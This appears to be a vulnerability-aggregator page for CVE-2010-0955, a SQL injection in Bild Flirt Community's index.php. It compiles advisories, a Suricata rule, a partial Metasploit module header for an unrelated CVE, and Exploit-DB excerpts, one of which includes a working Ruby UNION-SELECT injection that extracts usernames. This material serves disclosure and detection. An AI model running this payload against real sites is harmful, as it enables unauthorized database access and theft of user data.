CVE-2010-0955
published 2010-03-10CVE-2010-0955: SQL injection vulnerability in index.php in Bild Flirt Community 2.0 allows remote attackers to execute arbitrary SQL commands via the id parameter.
PriorityP343high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
1.21%
64.6th percentile
SQL injection vulnerability in index.php in Bild Flirt Community 2.0 allows remote attackers to execute arbitrary SQL commands via the id parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| media-products | bild_flirt_community | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
VulDB
Media-products Bild Flirt Community 2.0 index.php ID sql injection (EDB-11648 / XFDB-56727)
vuldb·2026-05-02·CVSS 7.5
CVE-2010-0955 [HIGH] Media-products Bild Flirt Community 2.0 index.php ID sql injection (EDB-11648 / XFDB-56727)
A vulnerability described as critical has been identified in Media-products Bild Flirt Community 2.0. This affects an unknown part of the file index.php. Executing a manipulation of the argument ID can lead to sql injection.
This vulnerability is registered as CVE-2010-0955. It is possible to launch the attack remotely. Furthermore, an exploit is available.
GHSA
GHSA-689m-m73q-6jmw: SQL injection vulnerability in index
ghsa_unreviewed·2022-05-02
CVE-2010-0955 [HIGH] CWE-89 GHSA-689m-m73q-6jmw: SQL injection vulnerability in index
SQL injection vulnerability in index.php in Bild Flirt Community 2.0 allows remote attackers to execute arbitrary SQL commands via the id parameter.
Suricata
GPL FTP SITE EXEC attempt
suricata·2010-09-23
CVE-1999-0080 GPL FTP SITE EXEC attempt
GPL FTP SITE EXEC attempt
Rule: alert ftp $EXTERNAL_NET any -> $HOME_NET any (msg:"GPL FTP SITE EXEC attempt"; flow:established,to_server; content:"SITE"; nocase; content:"EXEC"; distance:0; nocase; pcre:"/^SITE\s+EXEC/smi"; reference:arachnids,317; reference:bugtraq,2241; reference:cve,1999-0080; reference:cve,1999-0955; classtype:bad-unknown; sid:2100361; rev:18; metadata:created_at 2010_09_23, cve CVE_1999_0080, signature_severity Unknown, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2024_03_08;)
Exploit-DB
Creative Software AutoUpdate Engine - ActiveX Control Buffer Overflow (Metasploit)
exploitdb·2010-05-09
CVE-2008-0955 Creative Software AutoUpdate Engine - ActiveX Control Buffer Overflow (Metasploit)
Creative Software AutoUpdate Engine - ActiveX Control Buffer Overflow (Metasploit)
---
##
# $Id: creative_software_cachefolder.rb 9262 2010-05-09 17:45:00Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Creative Software AutoUpdate Engine ActiveX Control Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in Creative Software AutoUpdate Engine. When
sending an overly long string to the cachefolder() property of CTSUEng.ocx
an attacker may be able to execute arbitrary code.
},
'License' => MSF_LICENSE
Exploit-DB
Bild Flirt System 1.0 - SQL Injection
exploitdb·2010-04-14
CVE-2010-0955 Bild Flirt System 1.0 - SQL Injection
Bild Flirt System 1.0 - SQL Injection
---
----------------------------Information------------------------------------------------
+Name :Bild Flirt "
host=gets.chomp
print "#########################################################"
print "\nEnter script path (/forum/)->"
path=gets.chomp
print "#########################################################"
print "\nEnter script path (userid)->"
userid=gets.chomp
print "#########################################################"
begin
dir = "index.php?id=999999999+and+1=0+union+select+concat(0x23,0x23,0x23,0x23,0x23,name,0x23,0x23,0x23,0x23,0x23)+from+bildf_user+where+user_id="+ userid +"--"
http = Net::HTTP.new(host, 80)
resp= http.get(path+dir)
print "\nThe Username is -> "+(/#####(.+)#####/).match(resp.body)[1]
dir = "index.php?id=999999999+
Exploit-DB
Bild Flirt System 2.0 - 'index.php?id' SQL Injection
exploitdb·2010-03-07
CVE-2010-0955 Bild Flirt System 2.0 - 'index.php?id' SQL Injection
Bild Flirt System 2.0 - 'index.php?id' SQL Injection
---
----------------------------Information------------------------------------------------
+Name : Bild Flirt System V2.0 index.php (id) SQL Injection
+Autor : Easy Laster
+Date : 07.03.2010
+Script : Bild Flirt System V2.0
+Price : 14,95€
+Language :PHP
+Discovered by Easy Laster
+Security Group 4004-Security-Project
+Greetz to Team-Internet ,Underground Agents
+And all Friends of Cyberlive : R!p,Eddy14,Silent Vapor,Nolok,
Kiba,-tmh-,Dr Chaos,HANN!BAL,Kabel,-=Player=-,Lidloses_Auge,
N00bor,Ic3Drag0n,novaca!ne.
___ ___ ___ ___ _ _ _____ _ _
| | | | | | |___ ___ ___ ___ _ _ ___|_| |_ _ _ ___| _ |___ ___ |_|___ ___| |_
|_ | | | | |_ |___|_ -| -_| _| | | _| | _| | |___| __| _| . | | | -_| _| _|
|_|___|___| |_| |___|___|___|___|_| |_|_|
No writeups or analysis indexed.
http://4004securityproject.wordpress.com/2010/03/07/bild-flirt-system-v2-0-index-php-id-sql-injection/http://osvdb.org/62780http://packetstormsecurity.org/1003-exploits/bildflirt-sql.txthttp://secunia.com/advisories/38870http://www.exploit-db.com/exploits/11648http://www.securityfocus.com/bid/38585https://exchange.xforce.ibmcloud.com/vulnerabilities/56727http://4004securityproject.wordpress.com/2010/03/07/bild-flirt-system-v2-0-index-php-id-sql-injection/http://osvdb.org/62780http://packetstormsecurity.org/1003-exploits/bildflirt-sql.txthttp://secunia.com/advisories/38870http://www.exploit-db.com/exploits/11648http://www.securityfocus.com/bid/38585https://exchange.xforce.ibmcloud.com/vulnerabilities/56727
2010-03-10
Published